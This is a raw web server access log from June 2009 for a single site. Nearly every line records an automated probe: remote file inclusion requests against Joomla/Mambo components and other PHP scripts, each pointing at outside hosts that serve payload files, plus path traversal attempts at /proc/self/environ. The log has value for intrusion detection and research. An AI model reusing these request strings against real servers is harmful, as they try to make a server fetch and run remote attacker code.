77.221.130.5 - - [12/Jun/2009:14:50:20 -0700] "GET /logs/administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.projectpr.com"
77.221.130.5 - - [12/Jun/2009:14:50:26 -0700] "GET /logs/access_071212.log/administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.projectpr.com"
83.148.64.25 - - [12/Jun/2009:14:51:29 -0700] "GET /logs/administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.projectpr.com"
83.148.64.25 - - [12/Jun/2009:14:51:29 -0700] "GET /logs/access_070812.log/administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.projectpr.com"
83.148.64.25 - - [12/Jun/2009:14:51:34 -0700] "GET /logs/access_071212.log/administrator/components/com_extcalendar/admin_settings.php?CONFIG_EXT[ADMIN_PATH]=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 275 "-" "libwww-perl/5.810" "www.projectpr.com"
213.192.241.94 - - [12/Jun/2009:15:01:05 -0700] "GET /logs/access.log%20%20///?_SERVER[DOCUMENT_ROOT]=http://rsh.kiev.ua/images/idfx1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
213.192.241.94 - - [12/Jun/2009:15:01:06 -0700] "GET //?_SERVER[DOCUMENT_ROOT]=http://rsh.kiev.ua/images/idfx1.txt? HTTP/1.1" 200 9405 "-" "Mozilla/5.0" "www.projectpr.com"
213.192.241.94 - - [12/Jun/2009:15:01:07 -0700] "GET /logs///?_SERVER[DOCUMENT_ROOT]=http://rsh.kiev.ua/images/idfx1.txt? HTTP/1.1" 200 6807 "-" "Mozilla/5.0" "www.projectpr.com"
209.25.133.199 - - [12/Jun/2009:15:03:04 -0700] "GET /include/write.php?dir=http://colegiopenacorada.com/xoops_lib/modules/alba.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.projectpr.com"
209.25.133.199 - - [12/Jun/2009:15:03:04 -0700] "GET /logs//include/write.php?dir=http://colegiopenacorada.com/xoops_lib/modules/alba.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.projectpr.com"
209.25.133.199 - - [12/Jun/2009:15:03:43 -0700] "GET /include/write.php?dir=http://colegiopenacorada.com/xoops_lib/modules/pw.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.projectpr.com"
209.25.133.199 - - [12/Jun/2009:15:03:43 -0700] "GET /logs//include/write.php?dir=http://colegiopenacorada.com/xoops_lib/modules/pw.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.projectpr.com"
209.25.133.199 - - [12/Jun/2009:15:07:02 -0700] "GET /logs/access_071012.log//include/write.php?dir=http://colegiopenacorada.com/xoops_lib/modules/alba.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.projectpr.com"
209.25.133.199 - - [12/Jun/2009:15:07:27 -0700] "GET /logs/access_071012.log//include/write.php?dir=http://colegiopenacorada.com/xoops_lib/modules/pw.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.803" "www.projectpr.com"
110.45.144.107 - - [12/Jun/2009:15:13:33 -0700] "GET /logs/access_070912.log//include/write.php?dir=http://www.estojosfama.com.br/imagens/bann_representante.jpg??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.projectpr.com"
110.45.144.107 - - [12/Jun/2009:15:13:33 -0700] "GET /include/write.php?dir=http://www.estojosfama.com.br/imagens/bann_representante.jpg??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.projectpr.com"
110.45.144.107 - - [12/Jun/2009:15:13:33 -0700] "GET /logs//include/write.php?dir=http://www.estojosfama.com.br/imagens/bann_representante.jpg??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.projectpr.com"
110.45.144.107 - - [12/Jun/2009:15:21:50 -0700] "GET /logs/access_071012.log//include/write.php?dir=http://www.estojosfama.com.br/imagens/bann_representante.jpg??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.projectpr.com"
216.119.103.12 - - [12/Jun/2009:15:33:22 -0700] "GET /components/com_sef/sef.php?_REQUEST=&_REQUEST[option]=http://www.furniturebkk.com//components/com_virtuemart/shop_image/id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
216.119.103.12 - - [12/Jun/2009:15:33:22 -0700] "GET /logs/components/com_sef/sef.php?_REQUEST=&_REQUEST[option]=http://www.furniturebkk.com//components/com_virtuemart/shop_image/id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
216.119.103.12 - - [12/Jun/2009:15:33:22 -0700] "GET /logs/access_071112.log/components/com_sef/sef.php?_REQUEST=&_REQUEST[option]=http://www.furniturebkk.com//components/com_virtuemart/shop_image/id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
216.119.103.12 - - [12/Jun/2009:15:33:28 -0700] "GET /logs/access_070812.log/components/com_sef/sef.php?_REQUEST=&_REQUEST[option]=http://www.furniturebkk.com//components/com_virtuemart/shop_image/id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
218.38.243.71 - - [12/Jun/2009:15:33:34 -0700] "GET /logs/components/com_sef/sef.php?_REQUEST=&_REQUEST[option]=http://210.110.97.14/~designpower/bbs///skin/zero_vote/1.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
218.38.243.71 - - [12/Jun/2009:15:33:36 -0700] "GET /logs/access_071112.log/components/com_sef/sef.php?_REQUEST=&_REQUEST[option]=http://210.110.97.14/~designpower/bbs///skin/zero_vote/1.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
218.38.243.71 - - [12/Jun/2009:15:33:54 -0700] "GET /components/com_sef/sef.php?_REQUEST=&_REQUEST[option]=http://210.110.97.14/~designpower/bbs///skin/zero_vote/1.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
216.119.103.12 - - [12/Jun/2009:15:34:28 -0700] "GET /logs/access_071112.log%20%20/components/com_sef/sef.php?_REQUEST=&_REQUEST[option]=http://www.furniturebkk.com//components/com_virtuemart/shop_image/id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
216.119.103.12 - - [12/Jun/2009:15:34:28 -0700] "GET /logs/access_070812.log%20%20/components/com_sef/sef.php?_REQUEST=&_REQUEST[option]=http://www.furniturebkk.com//components/com_virtuemart/shop_image/id.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
218.38.243.71 - - [12/Jun/2009:15:36:13 -0700] "GET /logs/access_071112.log%20%20/components/com_sef/sef.php?_REQUEST=&_REQUEST[option]=http://210.110.97.14/~designpower/bbs///skin/zero_vote/1.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
218.38.243.71 - - [12/Jun/2009:15:36:14 -0700] "GET /logs/components/com_sef/sef.php?_REQUEST=&_REQUEST[option]=http://210.110.97.14/~designpower/bbs///skin/zero_vote/1.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
218.38.243.71 - - [12/Jun/2009:15:36:14 -0700] "GET /components/com_sef/sef.php?_REQUEST=&_REQUEST[option]=http://210.110.97.14/~designpower/bbs///skin/zero_vote/1.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
218.38.243.71 - - [12/Jun/2009:15:36:36 -0700] "GET /logs/access_071112.log%20%20/components/com_sef/sef.php?_REQUEST=&_REQUEST[option]=http://210.110.97.14/~designpower/bbs///skin/zero_vote/1.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
218.38.243.71 - - [12/Jun/2009:15:36:39 -0700] "GET /logs/components/com_sef/sef.php?_REQUEST=&_REQUEST[option]=http://210.110.97.14/~designpower/bbs///skin/zero_vote/1.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
218.38.243.71 - - [12/Jun/2009:15:36:40 -0700] "GET /components/com_sef/sef.php?_REQUEST=&_REQUEST[option]=http://210.110.97.14/~designpower/bbs///skin/zero_vote/1.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
123.242.165.138 - - [12/Jun/2009:15:45:47 -0700] "GET /components/com_sef/sef.php?_REQUEST=&_REQUEST[option]=http://www.portalwebfree.xpg.com.br/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.projectpr.com"
216.17.99.13 - - [12/Jun/2009:15:49:28 -0700] "GET //?_SERVER[DOCUMENT_ROOT]=http://www.rakkasanwarriors.com/db/ainul/AinuLid1.txt?? HTTP/1.1" 200 9405 "-" "Mozilla/5.0" "www.projectpr.com"
216.17.99.13 - - [12/Jun/2009:15:49:28 -0700] "GET /logs/access_071212.log///?_SERVER[DOCUMENT_ROOT]=http://www.rakkasanwarriors.com/db/ainul/AinuLid1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
216.17.99.13 - - [12/Jun/2009:15:49:28 -0700] "GET /logs///?_SERVER[DOCUMENT_ROOT]=http://www.rakkasanwarriors.com/db/ainul/AinuLid1.txt?? HTTP/1.1" 200 6807 "-" "Mozilla/5.0" "www.projectpr.com"
113.29.225.7 - - [12/Jun/2009:15:49:40 -0700] "GET /skin/zero_vote/error.php?dir=http://doverpark.org.sg/images/stories/food/fx29id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
113.29.225.7 - - [12/Jun/2009:15:49:40 -0700] "GET /logs/access_071212.log%20%20//skin/zero_vote/error.php?dir=http://doverpark.org.sg/images/stories/food/fx29id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
113.29.225.7 - - [12/Jun/2009:15:49:40 -0700] "GET /logs//skin/zero_vote/error.php?dir=http://doverpark.org.sg/images/stories/food/fx29id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
113.29.225.7 - - [12/Jun/2009:15:49:44 -0700] "GET /skin/zero_vote/error.php?dir=http://doverpark.org.sg/images/stories/food/fx29id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
113.29.225.7 - - [12/Jun/2009:15:49:44 -0700] "GET /logs/access_071212.log%20%20//skin/zero_vote/error.php?dir=http://doverpark.org.sg/images/stories/food/fx29id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
113.29.225.7 - - [12/Jun/2009:15:49:44 -0700] "GET /logs//skin/zero_vote/error.php?dir=http://doverpark.org.sg/images/stories/food/fx29id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
216.17.99.13 - - [12/Jun/2009:15:50:58 -0700] "GET /logs/access_071212.log%20%20///?_SERVER[DOCUMENT_ROOT]=http://www.rakkasanwarriors.com/db/ainul/AinuLid1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
216.17.99.13 - - [12/Jun/2009:15:52:05 -0700] "GET /logs/access_070912.log%20%20///?_SERVER[DOCUMENT_ROOT]=http://www.rakkasanwarriors.com/db/ainul/AinuLid1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
216.17.99.13 - - [12/Jun/2009:16:06:03 -0700] "GET /logs/access_070912.log///?_SERVER[DOCUMENT_ROOT]=http://www.rakkasanwarriors.com/db/ainul/AinuLid1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
66.11.230.36 - - [12/Jun/2009:16:07:25 -0700] "GET /logs//include/write.php?dir=http://www.scoringsessions.com///img/large/v5id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
66.11.230.36 - - [12/Jun/2009:16:07:26 -0700] "GET /include/write.php?dir=http://www.scoringsessions.com///img/large/v5id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
66.11.230.36 - - [12/Jun/2009:16:07:26 -0700] "GET /logs/access_070912.log//include/write.php?dir=http://www.scoringsessions.com///img/large/v5id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
66.11.230.36 - - [12/Jun/2009:16:12:03 -0700] "GET /logs/access_070912.log%20%20//include/write.php?dir=http://www.scoringsessions.com///img/large/v5id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
110.45.144.107 - - [12/Jun/2009:16:16:46 -0700] "GET /logs/access_071212.log//skin/zero_vote/error.php?dir=http://www.estojosfama.com.br/imagens/bann_representante.jpg??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.projectpr.com"
110.45.144.107 - - [12/Jun/2009:16:16:47 -0700] "GET /skin/zero_vote/error.php?dir=http://www.estojosfama.com.br/imagens/bann_representante.jpg??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.projectpr.com"
62.173.171.118 - - [12/Jun/2009:16:22:02 -0700] "GET /logs/access_071012.log%20%20/classes/adodbt/sql.php?classes_dir=http://aglifestylesmarketplace.com/fx29id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
62.173.171.118 - - [12/Jun/2009:16:22:02 -0700] "GET /logs/classes/adodbt/sql.php?classes_dir=http://aglifestylesmarketplace.com/fx29id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
62.173.171.118 - - [12/Jun/2009:16:22:05 -0700] "GET /classes/adodbt/sql.php?classes_dir=http://aglifestylesmarketplace.com/fx29id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
207.218.240.18 - - [12/Jun/2009:16:22:14 -0700] "GET /logs/access_071212.log//administrator/includes/admin.php?mosConfig_absolute_path=http://lms3.bu.ac.th:8080/claroline/user/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.projectpr.com"
207.218.240.18 - - [12/Jun/2009:16:22:14 -0700] "GET /administrator/includes/admin.php?mosConfig_absolute_path=http://lms3.bu.ac.th:8080/claroline/user/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.projectpr.com"
207.218.240.18 - - [12/Jun/2009:16:22:14 -0700] "GET /logs//administrator/includes/admin.php?mosConfig_absolute_path=http://lms3.bu.ac.th:8080/claroline/user/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.projectpr.com"
207.218.240.18 - - [12/Jun/2009:16:22:21 -0700] "GET /logs/access_071212.log//administrator/includes/admin.php?mosConfig_absolute_path=http://lms3.bu.ac.th:8080/claroline/user/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.projectpr.com"
207.218.240.18 - - [12/Jun/2009:16:22:21 -0700] "GET /administrator/includes/admin.php?mosConfig_absolute_path=http://lms3.bu.ac.th:8080/claroline/user/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.projectpr.com"
207.218.240.18 - - [12/Jun/2009:16:22:22 -0700] "GET /logs//administrator/includes/admin.php?mosConfig_absolute_path=http://lms3.bu.ac.th:8080/claroline/user/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.projectpr.com"
87.106.135.14 - - [12/Jun/2009:16:26:01 -0700] "GET /logs//components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.socawaremme.com//img/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
87.106.135.14 - - [12/Jun/2009:16:26:01 -0700] "GET /logs/access_070912.log//components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.socawaremme.com//img/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
87.106.135.14 - - [12/Jun/2009:16:26:01 -0700] "GET /components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.socawaremme.com//img/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
62.173.171.118 - - [12/Jun/2009:16:26:08 -0700] "GET /logs/access_071012.log/classes/adodbt/sql.php?classes_dir=http://aglifestylesmarketplace.com/fx29id.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
87.106.135.14 - - [12/Jun/2009:16:26:18 -0700] "GET /logs/access_071012.log//components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.socawaremme.com//img/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
123.242.165.138 - - [12/Jun/2009:16:29:07 -0700] "GET /logs/access_071212.log//administrator/includes/admin.php?mosConfig_absolute_path=http://jungkyung.hs.kr/skin_shop/standard/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.projectpr.com"
123.242.165.138 - - [12/Jun/2009:16:29:08 -0700] "GET /administrator/includes/admin.php?mosConfig_absolute_path=http://jungkyung.hs.kr/skin_shop/standard/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.projectpr.com"
123.242.165.138 - - [12/Jun/2009:16:29:08 -0700] "GET /logs//administrator/includes/admin.php?mosConfig_absolute_path=http://jungkyung.hs.kr/skin_shop/standard/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.projectpr.com"
123.242.165.138 - - [12/Jun/2009:16:29:08 -0700] "GET /logs/access_071212.log//administrator/includes/admin.php?mosConfig_absolute_path=http://www.portalwebfree.xpg.com.br/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.projectpr.com"
123.242.165.138 - - [12/Jun/2009:16:29:09 -0700] "GET /administrator/includes/admin.php?mosConfig_absolute_path=http://www.portalwebfree.xpg.com.br/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.projectpr.com"
123.242.165.138 - - [12/Jun/2009:16:29:10 -0700] "GET /logs//administrator/includes/admin.php?mosConfig_absolute_path=http://www.portalwebfree.xpg.com.br/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.projectpr.com"
87.106.135.14 - - [12/Jun/2009:16:29:55 -0700] "GET /logs/access_070912.log%20%20//components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.socawaremme.com//img/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
87.106.135.14 - - [12/Jun/2009:16:30:00 -0700] "GET /logs/access_071012.log%20%20//components/com_phpshop/toolbar.phpshop.html.php?mosConfig_absolute_path=http://www.socawaremme.com//img/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
123.242.165.138 - - [12/Jun/2009:16:33:20 -0700] "GET /logs/access_071112.log/components/com_sef/sef.php?_REQUEST=&_REQUEST[option]=http://www.portalwebfree.xpg.com.br/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.projectpr.com"
123.242.165.138 - - [12/Jun/2009:16:33:20 -0700] "GET /components/com_sef/sef.php?_REQUEST=&_REQUEST[option]=http://www.portalwebfree.xpg.com.br/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.projectpr.com"
123.242.165.138 - - [12/Jun/2009:16:33:21 -0700] "GET /logs/components/com_sef/sef.php?_REQUEST=&_REQUEST[option]=http://www.portalwebfree.xpg.com.br/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.projectpr.com"
123.242.165.138 - - [12/Jun/2009:16:34:08 -0700] "GET /logs/access_070812.log/components/com_sef/sef.php?_REQUEST=&_REQUEST[option]=http://www.portalwebfree.xpg.com.br/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.projectpr.com"
123.242.165.138 - - [12/Jun/2009:16:35:41 -0700] "GET /administrator/includes/admin.php?mosConfig_absolute_path=http://www.portalwebfree.xpg.com.br/mic22.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.projectpr.com"
207.218.240.18 - - [12/Jun/2009:16:42:19 -0700] "GET /logs/access_071112.log//administrator/includes/admin.php?mosConfig_absolute_path=http://lms3.bu.ac.th:8080/claroline/user/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.projectpr.com"
207.218.240.18 - - [12/Jun/2009:16:42:31 -0700] "GET /logs/access_071112.log//administrator/includes/admin.php?mosConfig_absolute_path=http://lms3.bu.ac.th:8080/claroline/user/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.projectpr.com"
87.106.135.14 - - [12/Jun/2009:16:44:17 -0700] "GET /components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.socawaremme.com//img/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
87.106.135.14 - - [12/Jun/2009:16:44:17 -0700] "GET /logs//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.socawaremme.com//img/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
87.106.135.14 - - [12/Jun/2009:16:44:17 -0700] "GET /logs/access_070912.log%20%20//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.socawaremme.com//img/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
87.106.135.14 - - [12/Jun/2009:16:44:30 -0700] "GET /logs/access_071012.log%20%20//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.socawaremme.com//img/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
87.106.135.14 - - [12/Jun/2009:16:47:20 -0700] "GET /logs/access_070912.log//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.socawaremme.com//img/fx29id1.txt?? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
87.106.135.14 - - [12/Jun/2009:16:49:41 -0700] "GET /logs//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.socawaremme.com//img/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
87.106.135.14 - - [12/Jun/2009:16:49:41 -0700] "GET /logs/access_070912.log%20%20//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.socawaremme.com//img/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
87.106.135.14 - - [12/Jun/2009:16:49:41 -0700] "GET /components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.socawaremme.com//img/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
87.106.135.14 - - [12/Jun/2009:16:52:52 -0700] "GET /logs/access_070912.log//components/com_rsgallery/rsgallery.html.php?mosConfig_absolute_path=http://www.socawaremme.com//img/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
190.144.44.36 - - [12/Jun/2009:16:54:00 -0700] "GET /logs//components/com_facileforms/facileforms.frame.php?ff_compath=http://ibmi.tempsite.ws/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
190.144.44.36 - - [12/Jun/2009:16:54:00 -0700] "GET /logs/access_071012.log//components/com_facileforms/facileforms.frame.php?ff_compath=http://ibmi.tempsite.ws/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
190.144.44.36 - - [12/Jun/2009:16:54:00 -0700] "GET /logs/access_070912.log//components/com_facileforms/facileforms.frame.php?ff_compath=http://ibmi.tempsite.ws/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
190.144.44.36 - - [12/Jun/2009:16:54:03 -0700] "GET /components/com_facileforms/facileforms.frame.php?ff_compath=http://ibmi.tempsite.ws/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
208.80.195.32 - - [12/Jun/2009:16:54:12 -0700] "GET / HTTP/1.0" 200 9405 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; SV1; .NET CLR 1.0.3705; .NET CLR 1.1.4322; Media Center PC 4.0; MSN 9.0;MSN 9.1; MSNbQ002; MSNmen-us; MSNcOTH)" "www.projectpr.com"
190.144.44.36 - - [12/Jun/2009:16:55:20 -0700] "GET /logs/access_071012.log%20%20//components/com_facileforms/facileforms.frame.php?ff_compath=http://ibmi.tempsite.ws/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
190.144.44.36 - - [12/Jun/2009:16:55:20 -0700] "GET /logs/access_070912.log%20%20//components/com_facileforms/facileforms.frame.php?ff_compath=http://ibmi.tempsite.ws/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.projectpr.com"
69.162.126.138 - - [12/Jun/2009:16:56:54 -0700] "GET /?path%5Bdocroot%5D=http://kmzrox.by.ru/tool25.dot?cmd=id? HTTP/1.1" 200 9405 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Avant Browser [avantbrowser.com]; iOpus-I-M; QXW03416; .NET CLR 1.1.4322)" "www.projectpr.com"
69.162.126.138 - - [12/Jun/2009:16:56:54 -0700] "GET /logs//?path%5Bdocroot%5D=http://kmzrox.by.ru/tool25.dot?cmd=id? HTTP/1.1" 200 6806 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; Avant Browser [avantbrowser.com]; iOpus-I-M; QXW03416; .NET CLR 1.1.4322)" "www.projectpr.com"
123.242.165.138 - - [12/Jun/2009:17:01:26 -0700] "GET /logs/access_071112.log//administrator/includes/admin.php?mosConfig_absolute_path=http://jungkyung.hs.kr/skin_shop/standard/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.projectpr.com"
77.240.235.130 - - [12/Jun/2009:17:03:09 -0700] "GET /logs/access.log//index.php?option=com_jreactions&Itemid=&mosConfig_absolute_path=http://traipod.altervista.org/id.txt? HTTP/1.1" 404 275 "-" "libwww-perl/5.808" "www.projectpr.com"
